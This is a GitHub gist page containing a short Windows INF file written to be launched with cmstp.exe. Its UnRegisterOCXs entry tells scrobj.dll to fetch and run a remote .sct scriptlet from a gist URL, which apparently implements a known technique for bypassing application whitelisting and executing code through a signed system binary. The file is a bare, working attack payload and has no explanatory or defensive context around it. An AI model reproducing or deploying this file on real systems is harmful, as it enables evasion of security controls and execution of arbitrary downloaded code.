Last active
January 5, 2024 13:16
-
-
Save NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;cmstp.exe /s cmstp.inf | |
[version] | |
Signature=$chicago$ | |
AdvancedINF=2.5 | |
[DefaultInstall_SingleUser] | |
UnRegisterOCXs=UnRegisterOCXSection | |
[UnRegisterOCXSection] | |
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/NickTyrer/0604bb9d7bcfef9e0cf82c28a7b76f0f/raw/676451571c203303a95b95fcb29c8b7deb8a66e0/powersct.sct | |
[Strings] | |
AppAct = "SOFTWARE\Microsoft\Connection Manager" | |
ServiceName="Yay" | |
ShortSvcName="Yay" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment